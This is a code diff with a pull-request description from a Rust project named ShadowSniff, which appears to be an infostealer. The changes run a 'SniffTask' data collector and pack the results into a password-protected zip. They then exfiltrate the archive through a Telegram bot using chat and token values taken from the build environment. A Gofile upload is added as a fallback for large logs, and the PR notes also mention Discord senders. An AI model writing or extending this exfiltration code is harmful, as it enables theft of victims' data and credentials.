+use zip::ZipArchive;
 
 mod panic;
 
@@ -29,29 +34,34 @@ pub fn main(_argc: i32, _argv: *const *const u8) -> i32 {
         panic!()
     }
 
-    let fs = StorageFileSystem;
-    let out = &Path::new("output");
-    let _ = fs.remove_dir_all(out);
-    let _ = fs.mkdir(out);
+    let fs = VirtualFileSystem::default();
+    let out = Path::new("\\output");
+    // let _ = fs.remove_dir_all(out);
+    let _ = fs.mkdir(&out);
 
     let collector = AtomicCollector::default();
 
     unsafe {
-        SniffTask::default().run(out, &fs, &collector);
+        SniffTask::default().run(&out, &fs, &collector);
     }
 
-    let displayed_collector = format!("{}", DisplayCollector(collector));
+    let displayed_collector = format!("{}", DisplayCollector(&collector));
 
     log_debug!("{displayed_collector}");
 
-    // let zip = ZipArchive::default()
-    //     .add_folder_content(&fs, &out)
-    //     .password("shadowsniff-output")
-    //     .comment(displayed_collector)
-    //     .create();
-    //
+    let password = "shadowsniff-output".to_string();
+    let zip = ZipArchive::default()
+        .add_folder_content(&fs, out)
+        .password(&password)
+        .comment(displayed_collector)
+        .create();
+
     // let out = Path::new("output.zip");
     // let _ = StorageFileSystem.write_file(&out, &zip);
+
+    TelegramBot::new(Arc::from(env!("TELEGRAM_CHAT_ID")), Arc::from(env!("TELEGRAM_BOT_TOKEN")))
+        .send(LogFile::ZipArchive(zip), Some(password), &collector)
+        .unwrap();
 
     0
 }

--- a/src/main.rs
+++ b/src/main.rs
@@ -15,6 +15,7 @@ use filesystem::path::Path;
 use filesystem::virtualfs::VirtualFileSystem;
 use filesystem::FileSystem;
 use ipinfo::init_ip_info;
+use sender::gofile::Gofile;
 use sender::telegram_bot::TelegramBot;
 use sender::{LogFile, LogSender};
 use shadowsniff::SniffTask;
@@ -49,7 +50,7 @@ pub fn main(_argc: i32, _argv: *const *const u8) -> i32 {
 
     log_debug!("{displayed_collector}");
 
-    let password = "shadowsniff-output".to_string();
+    let password = "shadowsniff-ouasdjkasjdbvtput".to_string();
     let zip = ZipArchive::default()
         .add_folder_content(&fs, out)
         .password(&password)
@@ -59,7 +60,9 @@ pub fn main(_argc: i32, _argv: *const *const u8) -> i32 {
     // let out = Path::new("output.zip");
     // let _ = StorageFileSystem.write_file(&out, &zip);
 
-    TelegramBot::new(Arc::from(env!("TELEGRAM_CHAT_ID")), Arc::from(env!("TELEGRAM_BOT_TOKEN")))
+    let telegram = TelegramBot::new(Arc::from(env!("TELEGRAM_CHAT_ID")), Arc::from(env!("TELEGRAM_BOT_TOKEN")));
+
+    Gofile::new(telegram)
         .send(LogFile::ZipArchive(zip), Some(password), &collector)
         .unwrap();
 

--- a/utils/src/lib.rs
+++ b/utils/src/lib.rs
@@ -4,6 +4,7 @@
 
 extern crate alloc;
 
+use alloc::format;
 use alloc::string::String;
 use core::ops::Deref;
 use filesystem::FileSystem;
@@ -53,4 +54,15 @@ where
     }
 
     Some(flag)
+}
+
+pub fn format_size(bytes: u64) -> String {
+    let units = ["B", "KB", "MB", "GB", "TB", "PB"];
+    let mut size = bytes as f64;
+    let mut i = 0;
+    while size >= 1024.0 && i < units.len() - 1 {
+        size /= 1024.0;
+        i += 1;
+    }
+    format!("{:.2} {}", size, units[i])
 }


### PR DESCRIPTION
### Major
- [x] Telegram https://github.com/sqlerrorthing/ShadowSniff/pull/62
- [x] Discord https://github.com/sqlerrorthing/ShadowSniff/pull/64

### Minor
- [x] Fallback file storage service https://github.com/sqlerrorthing/ShadowSniff/pull/63
        *if the log file too big to selected service, they'll upload the log file to external storage service and provide a link*
- [x] Size fallback sender https://github.com/sqlerrorthing/ShadowSniff/pull/61/commits/f4d069ba73f13c0a885a5ba86f3626cf0d48795e
        *if the log file exceeds the limit of primary sender, they will use fallback sender*